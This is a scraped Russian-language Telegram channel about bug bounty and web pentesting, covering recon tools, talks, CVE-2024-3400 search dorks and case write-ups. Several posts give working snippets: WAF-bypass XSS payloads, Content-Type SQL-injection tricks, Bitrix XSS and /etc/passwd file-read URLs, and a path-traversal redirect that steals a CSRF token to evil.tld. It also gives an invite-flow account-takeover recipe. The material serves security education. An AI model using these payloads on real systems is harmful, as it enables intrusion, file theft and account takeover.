shadow_group_tg | Unsorted

Telegram-канал shadow_group_tg - SHADOW:Group

11529

Чат: @shadow_chat_tg Предложения, вопросы, сотрудничество: @shdwpwn

Subscribe to a channel

SHADOW:Group

🔎Собираем поддомены и IP в RSECloud

Недавно нашел новый ресурс, под названием RSECloud, который позволяет собирать поддомены и IP'шники организации по домену или имени организации. Работает как в вебе, так и через API.

Чтобы удобно прикрутить его к своей автоматизации накидал небольшой скрипт на GO, который предполагает 3 варианта использования:

Сбор поддоменов:

rsescan -d example.com -key YOUR_API_KEY


Сбор IP'шников по домену:
rsescan -d example.com -cn -key YOUR_API_KEY


Сбор IP'шников по имени организации:
rsescan -so "Organization Name" -key YOUR_API_KEY


Для получения API ключа нужно просто пройти регистрацию по почте. Для всех желающих залил скрипт на гитхаб.

Ссылка на RSECloud
Ссылка на скрипт

#web #recon

Читать полностью…

SHADOW:Group

👨‍💻Доклады с PHDays 2

На ютубе появляются доклады с прошедшего PHDays 2 и вот вам некоторые из них:

Учат в школе
Выступление, посвященное различным уязвимостям и методам взлома на платформах для обучения хакеров.

Выявление многоэтапных SQL-инъекций
Про то, как бизнес-логика может предполагать срабатывание инъекций через несколько этапов и запросов, и показывает инструменты для работы с такими инъекциями.

Вам письмо: старые новые атаки на почту
Про уязвимости внедрение кода в современной электронной почте.

Тонкости импортозамещения CMS. Собираем bug bounty и БДУ по реестру отечественного ПО
Про поиск уязвимостей в отечественных CMS и пополнение БДУ новыми уязвимостями.

XXE: как обработка XML приводит к проблемам с безопасностью
Основы эксплуатации XXE и защиты (или ее отсутствии) от этой уязвимости в разных фреймворках, с примерами уязвимого кода из open-source-проектов.

Анализ клиентского JavaScript для обнаружения HTTP-эндпоинтов: два года спустя
Про разработку статического анализатора клиентского JavaScript-кода для обнаружения серверных HTTP-эндпоинтов.

Еще больше крутых выступлений смотрите на ютуб по ссылке ниже.

Ссылка на плейлист

#learn #web #redteam

Читать полностью…

SHADOW:Group

👊 Эксплуатация двусторонней SSRF с воздействием на сервер и клиента

В статье описывается интересный случай эксплуатации уязвимости SSRF (Server-Side Request Forgery), который затронул как серверную, так и клиентскую стороны и позволил проникнуть во внутренние сети, а также получить доступ к конфиденциальной информации

Ссылка на статью

#web #ssrf #csrf

Читать полностью…

SHADOW:Group

⭕️Обход WAF для эксплуатации CSPT с использованием разных уровней кодирования

В данной статье подробно объясняются принципы работы CSPT, приводится пример уязвимости на веб-сайте, и способы обхода WAF, используя разное количество декодирований URL.

В частности, описаны различные сценарии, где уровень кодирования WAF отличается от уровня кодирования приложения. Для каждого случая предложены методы обхода, демонстрирующие, как вредоносные URL могут быть пропущены через WAF и использованы для выполнения XSS-атак.

Ссылка на статью

#web #cspt #bypass #waf

Читать полностью…

SHADOW:Group

​​🥇Pentest Award возвращается

Ребята из Awillix анонсировали прием заявок на ежегодную премию для пентестеров - Pentest Award.

Вы можете громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики.

В этот раз будет 6 номинаций, по три призовых места в каждой:

— Пробив WEB
— Пробив инфраструктуры
— Девайс
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка

Главный приз — тяжеленная стеклянная именная статуэтка за первое место. Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.

Сбор заявок уже открыт на сайте — https://award.awillix.ru/, а посмотреть, как это было в прошлом году можно тут.

#pentestaward

Читать полностью…

SHADOW:Group

Привет!

Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.

Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.

Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.

Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️

https://github.com/curiv/russian-offensive-security-questions

#pentest #interview #repository

Читать полностью…

SHADOW:Group

🌐 Palo Alto GlobalProtect - OS Command Injection

Уязвимость выполнения команд (CVE-2024-3400), затрагивает функцию GlobalProtect в нескольких последних версиях PAN-OS - программного обеспечения, которое работает на большинстве современных устройств брандмауэра Palo Alto Networks.

GlobalProtect - это функция VPN PAN-OS, что приводит к наличию множества уязвимых устройств подключенных к Интернету. Подробный анализ читайте по ссылке.

Дорк Shodan:
http.html_hash:-1303565546

Дорк Censys:
services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1

Дорк Fofa:
icon_hash="-631559155"

Дорк Zoomeye
app:"Palo Alto Networks firewall httpd"

Дорк Hunter.how
product.name="GlobalProtect Portal"

Ссылка на PoC
Ссылка на шаблон Nuclei

#web #rce #dork #cve

Читать полностью…

SHADOW:Group

В нашем новом выпуске мы пригласили человека из мира мобильного багхантинга, активного участника форума Antichat, и автора проекта reFlutter. Его история вызывает восхищение и уважение 🦾
https://youtu.be/2KCSxYQ543M

Читать полностью…

SHADOW:Group

Тем временем, число подписчиков на канале перевалило за 10к! Спасибо всем за то, что читаете, шарите посты по другим каналам и чатикам, а также делитесь фидбеком и интересными находками, вы крутые!❤️

Читать полностью…

SHADOW:Group

😈 Social Engineeringсамый крупный ресурс в Telegram, посвященный Информационной Безопасности, OSINT и Cоциальной Инженерии.

Особое внимание стоит обратить на следующую информацию:

Собственный бот, который проверит Ваш файл 70 антивирусами одновременно.
Наш репозиторий с подборкой материала для изучения компьютерных сетей.
Коллекция инструментов и ресурсов для поиска информации о человеке в 2024 году.
Актуальные методы социальной инженерии и профайлинга.
Бесплатные курсы для изучения ИБ и OSINT.

Вас ждёт только актуальный и качественный материал. @S.E.

Читать полностью…

SHADOW:Group

🗂 #заметки #web #offense

➡️Rather old, but gold информация, которая до сих пор пригождается при анализе защищённости веб-приложений;


   🧩  BlackFan/content-type-research

Манипуляция Content-Type для эксплуатации некорректного парсинга и, следовательно, для обхода WAF, внедрения полезной нагрузки для XSS и проведения CSRF;

Базовый пример идеи из репозитория:

Content-Type: application/x-www-form-urlencoded
Body: q=' union select '1

➡️ App' union select 1'
➡️ WAF: ' union select 1'

Content-Type: application/json
Body: {"q":"' \u0075nion \u0073elect '1"}

➡️ App' union select 1'
➡️ WAF: ' union select 1'

Content-Type: application/x-www-form-urlencoded;/json
Body: {"q":"' \u0075nion \u0073elect '1"}

➡️ App: ' union select 1'
➡️ WAF: {"q":"' \u0075nion \u0073elect '1"}


💻 BlackFan/content-type-research/ct-tricks – подобные трюки в зависимости от особенностей конкретной технологии;

💻 BlackFan/content-type-research/XSS – примеры Content-Type, которые могут быть использованы для внедрения полезной нагрузки для эксплуатации XSS;

💻 BlackFan/content-type-research/Browsers – примеры Content-Type, которые могут быть использованы для cross-origin запросов в зависимости от браузера;


   🧩  BlackFan/client-side-prototype-pollution

💻 BlackFan/client-side-prototype-pollution/pp – перечень технологий, уязвимых к Prototype Pollution, с указанием CVE, уязвимого фрагмента кода и PoC;

💻 BlackFan/client-side-prototype-pollution/gadgets – перечень гаджетов для списка технологий с указанием JS фингерпринта, уязвимого фрагмента кода и PoC;
//  Подобное от PortSwigger: XSS/Cheat-Sheet#Prototype Pollution



   @HaHacking  🐇

Читать полностью…

SHADOW:Group

Поздравляем @b4bk4 с похеком хрома и двумя CVE)

Читать полностью…

SHADOW:Group

🎤Responsible disclosure podcast

Топ немецкого багбаунти @Valyaroller наконец представил первый выпуск своего подкаста на русском языке. Всем багхантерам, пентестерам и тем, кто в теме рекомендую к просмотру! Поддержите лайками, подписками и полезным фидбеком!

Ссылка на YouTube

Читать полностью…

SHADOW:Group

Две недели назад вышел новый релиз Nuclei v3.2.0 от Project Discovery.

В новой версии добавили расширенную функциональность сканов с учетными данными, поддерживающую различные схемы аутентификации

nuclei -u http://example.com/ -secret-file example_auth.yaml


Authentication Types:
✅ Static Authentication - статичные креды (username и password) для Basic Auth, API Key, Bearer Token, Custom Header, Cookie
✅ Dynamic Authentication - OAuth2.0, когда статичные креды (username и password) используются для получения Session Tokens/Cookie, Custom Header

Secret file содержит учетные данные для аутентификации для ресурсов по совпадению значений domains и domains-regex, без необходимости изменять уже существующие шаблоны

static:
# 1. Basic Auth based auth
- type: basicauth
domains:
- scanme.sh
username: test
password: test
# 2. Bearer Token based auth
- type: bearertoken
domains-regex:
- .*scanme.sh
- .*example.com
token: test
dynamic:
- template: /path/to/wordpress-login.yaml
variables:
- name: username
value: test
- name: password
value: test
type: cookie
domains:
- blog.example.com
cookies:
- raw: "{{wp-global-cookie}}"
- raw: "{{wp-admin-cookie}}"
- raw: "{{wp-plugin-cookie}}"


В следующих релизах авторы планируют также добавить интеграцию с HashiCorp Vault, AWS Secrets Manager и 1Password

Читать полностью…

SHADOW:Group

📨Немного про уязвимости в функциях регистрации и приглашения пользователей

Неоднократно сталкивался с подобным кейсом в различных компаниях:

🔹Используем функцию приглашения пользователя и указываем там свою резервную почту
🔹Получаем приглашение себе на резервную почту
🔹Переходим по ссылке из приглашения, задаем пароль, перехватываем запрос и изменяем адрес электронной почты в запросе через параметр "email" на почту жертвы
🔹Получаем аккаунт, зарегистрированный на чужую почту без подтверждения от её владельца.

Но как можно повысить импакт?

🔹попробовать подставить почту существующего пользователя, что может привести к смене его пароля и, как следствие, захвату аккаунта
🔹если предыдущий трюк не сработал, то можно еще проверить на CSRF. Недавно на багбаунти попался похожий кейс, где просто подстановка почты жертвы не работала, но при CSRF с куками жертвы позволяла поменять ему адрес почты и/или пароль без подтверждения
🔹попробовать зарегистрировать корпоративные учетки, например, такие как shdw@company.com, admin@company.com и т.д. Для корпоративных учеток может быть доступен дополнительный (в том числе админский) функционал, недоступный обычным пользователям.

#web #logic #ato

Читать полностью…

SHADOW:Group

Доброй ночи.
Написал небольшую книжку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org

#book #linux #hex

Читать полностью…

SHADOW:Group

👾Как был найден RCE в одной из публичных программ на Bugcrowd

В статье описывается пошаговый процесс поиска RCE, начиная со сбора интересных активов и сканирования портов, и заканчивая тестированием различных эксплойтов и проверкой эндпоинтов. Автор также рассказывает о своих неудачах и успехах, приводя пример того, как настойчивость, упорство и немного удачи привели к успешному обнаружению серьезной уязвимости.

Ссылка на статью

#web #rce #struts

Читать полностью…

SHADOW:Group

Подведем итоги нашего бесплатного курса "Linux для новичков". Курс был составлен из различных модулей, предназначенных для ознакомления с основными аспектами работы в операционной системе Linux.

В рамках курса были изучены основы работы с файлами и директориями, управление пользователями и группами, сетевые возможности Linux, мониторинг, журналирование и проверка безопасности. Также были рассмотрены темы работы с данными и дисками в Linux, туннелирование трафика и полезные инструменты для взлома.

Неделя 1: Введение в Linux
Что такое Linux и почему его выбирают?
Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
Структура файловой системы Linux: /bin, /etc, /home и др.
Пакетный менеджер APT для установки и обновления программ.
Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

Неделя 2: Работа с файлами и директориями
Основные команды для работы с файлами и директориями: cp, mv, rm и др.
Работа с архивами в Linux: создание, разархивирование, просмотр.
Поиск файлов и содержимого в Linux: команды find и grep.
Управление правами доступа к файлам и директориям в Linux: chmod и chown.
Символьные и жесткие ссылки: создание и использование.
Управление процессами и задачами в Linux: команды ps, top, kill и др.
Автоматическое выполнение задач с помощью cron.

Неделя 3: Управление пользователями и группами
Создание и удаление пользователей в Linux: команды useradd и userdel.
Управление паролями пользователей: команда passwd.
Назначение пользователей в группы: команда usermod.
Создание и удаление групп в Linux: команды groupadd и groupdel.
Управление правами доступа к файлам и директориям для пользователей и групп.
Просмотр информации о пользователях и группах: команды id, whoami и др.
Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.

Неделя 4: Сетевые возможности Linux
Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
Проверка сетевого подключения: команда ping.
Конфигурация сетевых интерфейсов: команды ifconfig и ip.
Работа с удаленными хостами через SSH: подключение, передача файлов.
Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf.
Настройка файрвола в Linux: команда iptables.
Основы настройки и использования сетевых служб в Linux: FTP, Samba и др.
Основы настройки и использования сетевых служб в Linux: Apache.

Неделя 5: Мониторинг, журналирование, проверка безопасности.
Лог файлы системы Linux
Как настроить центральный сервер ведения логов с помощью Rsyslog в Linux.
Анализ лог-файлов: команды grep, awk, sed.
Настройка системы мониторинга и аудита: утилиты auditd, nmon.
Система мониторинга Zabbix
Мониторинг сети с помощью tcpdump
Проверка безопасности системы с помощью LinPEAS

Неделя 6: Работа с данными и дисками в Linux
Использование утилиты rsync для синхронизации данных.
Основы языка сценариев Bash: переменные, условия, циклы.
Создание и выполнение сценариев Bash: утилита bash.
Работа с образами дисков: команды dd, ddrescue.
Восстановление данных с помощью LiveCD.
Создание и настройка RAID-массивов для защиты данных.
Дефрагментация диска Linux

Неделя7: Туннелирование трафика
Установка и настройка OpenVPN сервера на Ubuntu
Простая настройка WireGuard Linux.
Настройка Shadowsocks.
Pivoting: Chisel
SSH туннели
Проксирование трафика с помощью proxychains
Pivoting: Lugolo-ng

Неделя 8: Полезные инструменты для взлома
nmap 1 часть
nmap 2 часть
nmap 3 часть
crackmapexec
metasploit
Burp Suite
sqlmap

Не забывайте сохранить и поделиться нашим бесплатным курсом "Linux для новичков"!

#Linux #обучениеlinux #статьипоLinux

LH | Новости | Курсы | Мемы

Читать полностью…

SHADOW:Group

💉 Продвинутые SQL инъекции для AWAE

Репозиторий по ссылке предназначен для обучения и демонстрации методов продвинутой SQL-инъекции. Он содержит примеры, учебные материалы и практические задания, ориентированные на подготовку к экзамену Offensive Web Application Expert (AWAE) от Offensive Security.

Вы сможете изучить различные техники эксплуатации SQL-инъекций, включая их обнаружение, использование и защиту от них.

В репозитории представлены подробные пошаговые инструкции и примеры кода, которые позволяют практиковаться в выполнении сложных атак на веб-приложения.

Ссылка на GitHub

#sqli #bypass #learn

Читать полностью…

SHADOW:Group

💥 Как мы превратили DOM XSS в изощренный захват аккаунта в один клик, оцененный в $8000

Увлекательное кейс-исследование, где авторам удалось превратить простой, на первый взгляд, DOM XSS в изощренный захват аккаунта в один клик. В статье рассказано о мыслительном процессе, преградах, с которыми пришлось столкнуться, и о том, как их преодолеть, чтобы получить полностью рабочий эксплойт.

Читать статью

#web #xss #ato

Читать полностью…

SHADOW:Group

🪙 Bug Bounty Blueprint: Руководство для начинающих.

• Очень информативное руководство по Bug Bounty, которое содержит полезные инструменты, лабы, ресерчи, кейсы из жизни и еще очень много полезных ссылок.

➡️ https://blog.securitybreached.org/

#BB

Читать полностью…

SHADOW:Group

Спасибо @ValyaRoller за приглашение на подкаст! Подписывайтесь на его замечательный канал @pigPeter

Кому интересен кейс с paypal, тут подробнее можно почитать: t.me/postImpact/6

такой же кейс все еще работает с TripAdvisor так что можете счейнить до high с любой xss на поддоменах: Pattern.compile("^(?:https?\\:\\/\\/(?:[A-Za-z0-9_\\-]+\\.(dhcp(\\-[A-Za-z]+)?\\.([A-Za-z0-9_\\-]+\\.corp\\.)?|(nw\\.)?dev(\\-[A-Za-z]+)?\\.|cmc\\.|d\\.)?)?tripadvisor\\.(?:com|(?:[a-z]{2})|(?:(?:co|com)\\.[a-z]{2})))?\\/.*$");

Вообще многие сдают не раскручивая — сдают medium вместо high теряя значительное bounty.

Еще кейс с dyson не попал в видео, там я рассказывал про то что у них одна тестовая репа попала в публичный bitbucket (всего на пару часов), а там был логин/пароль QA. И пароль подходил к его рабочему outlook , внутреннему bitbucket и slack. Как итог - доступ к главному домену dyson.com и сорцам. Так что нужны второй фактор и еще фингерпиринты к браузерам/ip.

про мою первую багу в ICQ, на самом деле 150$ (отчет оказался частично раскрытым) — https://hackerone.com/reports/373909

Читать полностью…

SHADOW:Group

👍 Обход защиты от XSS

Статья по байпассу средств защиты от XSS для некоторых кейсов. Как итог, получаем несколько довольно универсальных пэйлодов, которые могут пригодится вам и в других случаях (мне пригодились):

Imperva & Incapsula:

<details/open/id="&quot;"ontoggle=[JS]>

Amazon Cloudfront

<details/open/id="&quot;"ontoggle=[JS]>

Akamai

<details open id="' &quot;'"ontoggle=[JS]>

Еще больше байпассов для XSS доступно в репозитории на GitHub.

#web #xss #waf #bypass

Читать полностью…

SHADOW:Group

Все что надо знать про новую RCE в Outlook

Читать полностью…

SHADOW:Group

😱 Уязвимости в установщике Битрикс

Для установки Битрикса есть скрипт bitrixsetup.php, который разработчики рекомендуют удалять после установки, но, как выяснилось, не все это делают. При обнаружении этого скрипта основной вектор атаки, который приходит в голову, это переустановить CMS и загрузить веб-шелл через административную панель.

Иногда админы просто ограничивают права на запись в директорию и считают, что этого будет достаточно, однако данный скрипт сам по себе оказался уязвим к XSS и LFR:

XSS:

https://target.com/bitrixsetup.php?action=UNPACK&amp;filename=&lt;img src='' onerror=alert(document.domain)>

LFR:
https://target.com/bitrixsetup.php?action=UNPACK&amp;filename=../../../../etc/passwd 


Более подробно читайте в статье на хабре.

#web #bitrix #xss #lfr

Читать полностью…

SHADOW:Group

🌐 Увеличиваем Attack Surface на пентесте периметра

На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях приходится recon-ить все ресурсы компании самостоятельно. Зачастую компании сами не подозревают, какие ресурсы у них могут «торчать наружу».

Аналогичная ситуация ждет вас и на багбаунти, когда у программы широкий скоуп и грамотная разведка и сбор ресурсов компании может помочь найти вам то, что не нашли другие.

Из статьи ниже вы поймете на практическом примере как производить сбор IP-адресов заказчика, а также проводить горизонтальный и вертикальный поиск доменов.

Читать статью

#web #recon

Читать полностью…

SHADOW:Group

С двух ног врываюсь в фаззинг/экплоит дев браузеров. сразу получеными двумя CVE(UXSS и Adress Bar Spofing) и футболкой по почте. На самом деле потребовалось полтора года на попытки и освоение движка V8, и умение фаззить. А оказалось достаточно все просто, с нуля написать фаззер, благо если знаешь теория пишется быстро, выставление санитайзероми и https://github.com/YulinSec/ChatGPTScanner как проверка на действительно полезные вылеты программ. Наконец нормально рабочие примение LLM в ИБ. Схема проста, фаззер фаззит, дает тебе вылеты, тот скрипт проверяет на ценность вылетов, при легком изменение кода сам пишет poc. Тебе только проверять на действительные ценные poc.
В частности следующий апдейт хрома будет из за меня, так что извините.
PS? Этот канал был создан что бы выкладывать свои пет проекты/идеи которые всплывают в голове.

Читать полностью…

SHADOW:Group

⭕️Про сlient-side path traversal

Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.

Например, если приложение через fetch() добавляет заголовок csrfToken при обращении к /api/user, то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на /api/user/../redirect?to=evil.tld/corsAllow

Еще больше практических примеров использования path traversal на стороне клиента вы можете узнать из статей, представленных ниже:

➖Practical Example Of Client Side Path Manipulation
➖From an Innocent Client-Side Path Traversal to Account Takeover
➖Client-side path traversal vulnerability class explained - $6,580 GitLab bug bounty

➖Practical Client Side Path Traversal Attacks
Nightbloodz/the-power-of-client-side-path-traversal-how-i-found-and-escalated-2-bugs-through-670338afc90f">➖The power of Client-Side Path Traversal: How I found and escalated 2 bugs through "../"

#web #pathtraversal

Читать полностью…

SHADOW:Group

🖥 Автоматизируем поиск CRLF

Наткнулся на пост, где автор вдохновился исследованием HTTP Request Splitting от @blackfan и решил накидать скрипт для детекта некоторых представленных там уязвимостей.

Подробнее про работу скрипта рассказано тут а сам код доступен на GitHub. А на скрине сверху, уже другой исследователь запилил шаблон для Bcheck, чтобы детектить это в Burp Suite.

Для эксплуатации уязвимой конечной точки можете обратиться к данному исследованию и помните, чтобы иметь хороший рабочий PoC при отправке - демонстрируйте импакт, а не уязвимость.

#web #crlf

Читать полностью…

SHADOW:Group

⌨️Как киношные хакеры испортили жизнь ИБ-специалистам

Многие из нас видели в кино кулхацкеров способных в пару кликов взломать любую систему. Вдобавок к этому сцены взлома сопровождаются звуковыми и визуальными эффектами, которые вызывают если не смех, то ироническую улыбку у всех, кто в теме.

В статье на Хабре автор решил развеять миф о всесильности хакеров и объяснить, как этот миф мешает внедрению культуры кибербезопасности в компаниях.

Ссылка на Habr

Читать полностью…
Subscribe to a channel